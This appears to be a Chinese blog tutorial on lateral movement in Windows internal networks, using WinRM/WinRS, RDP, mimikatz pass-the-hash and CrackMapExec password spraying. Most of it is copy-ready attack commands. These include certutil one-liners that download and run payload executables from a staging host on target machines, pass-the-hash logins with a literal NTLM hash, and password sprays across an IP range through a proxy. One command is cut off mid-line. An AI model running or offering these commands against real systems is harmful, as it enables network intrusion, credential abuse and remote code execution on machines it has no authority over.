1. 内网横向移动
1、横向移动篇-协议服务-WinRS&WinRM&RDP
2、横向移动篇-工具项目-密码喷射
1.1 内网横向移动方法分类
基于口分
ipc smb wmi dcom winrs winrm rdp等
基于漏洞
域控提取漏洞 Exchange漏洞攻防
基于配置
委派 dysnc asrep kerberos攻击 ntlmreply
1.2 WinRM&WinRS
WinRM代表Windows远程管理,是一种允许管理员远程执行系统管理任务的服务。WinRS是内置的命令行工具,用于远程连接运行WinRM的服务器并执行大多数cmd命令
参考:横向移动之WinRM横向移动-腾讯云开发者社区-腾讯云
1.2.1 利用条件
1、win之前利用需要手动开启winRM ,在win之后包括win的版本是默认开启的,、防火墙对5986、5985端口开放。
开启命令:
winrm quickconfig -q
winrm set winrm/config/Client '@{TrustedHosts="*"}'
1.2.1.1 探针可用
端口扫描5985 如果端口开启5985就可以利用WinRM,不过没有放弃这一个利用方式 思考SMB或者其他的
1.2.1.2 连接执行
连接执行:通过winrs来执行远程命令
winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 whoami
1.2.1.3 CS上线利用
如果端口开了,先使用ping 能ping通说明防火墙可能是关的,正向和反向都可以 如果是ping不通就是开的, 开的就要看winrm开没开开了可以使用icmp包装利用,没开winrm就不能利用
winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"
connect 192.168.3.32 4444
1.2.1.3.1 反向连接上线abcdefg
shell winrm invoke Create wmicimv2/win32_process @{CommandLine="cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/31.exe 31.exe & 31.exe"} -r:sqlserver -u:sqlserver\administrator -p:admin!@#45
1.2.1.4 CS内置模块
winrm winrm64
1.2.1.5 其他解决
通过winrm.cmd来进行命令执行
shell winrm invoke Create wmicimv2/win32_process @{CommandLine="cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"} -r:sqlserver -u:sqlserver\administrator -p:admin!@#45
这里关闭入站的协议规则
1.3 RDP
远程桌面服务 支持明文及HASH连接
条件:对方开启RDP服务 远程桌面
1.3.1 探针连接
端口扫描3389
tasklist /svc |find "TermService"# 找到对应服务进程的PID
netstat -ano | find “pid”
1.3.2 连接执行
明文连接:适用于Socks代理后
mstsc /console /v:192.168.3.32 /admin
端口转发
mimikatz(HASH连接)不推荐
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c
SharpRDP(明文连接)不推荐
https://github.com/0xthirteen/SharpRDP
是一款可以不借助远程桌面GUI的情况下,通过RDP协议进行命令执行的程序。
SharpRDP.exe computername=192.168.3.32 command="powershell.exe -nop -w hidden -c\"IEX
1.3 CrackMapExec-密码喷射
1.3.1 手工去横向移动
、目标太多
、密码太多
、帐号太多
、协议太多
借助工具
Github:https://github.com/Porchetta-Industries/CrackMapExec
官方手册:https://www.crackmapexec.wiki/
使用案例:域渗透之CrackMapExec - Yangsir34 - 博客园
下载对应release,建立socks连接,设置socks代理,配置规则,调用!
1.3.2、Linux Proxychains使用
代理配置:Proxychains.conf
代理调用:Proxychains 命令
1.3.3、密码喷射-域用户登录PTH:
主要参数:-u用户,-p密码,-H哈希值,-d指定域,-x执行命令
主要功能:多协议探针,字典设置,本地及域喷射,命令回显执行等
proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c
#域用户HASH登录
proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -p “admin!@#45” --local-auth #本地用户明文登录
proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -p "admin\!@#45" --local-auth
proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -p “admin\!@#45” --local-auth -x “whoami” #本地用户明文登录
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth -x "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/31.exe 31.exe & 31.exe"
proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -p pass.txt --local-auth -x "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"
枚举计算机用户
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth --users
标签:exe,RDP,WinRM,winrm,192.168,crackmapexec,4444,内网,smb From: https://blog.csdn.net/m0_74402888/article/details/144831650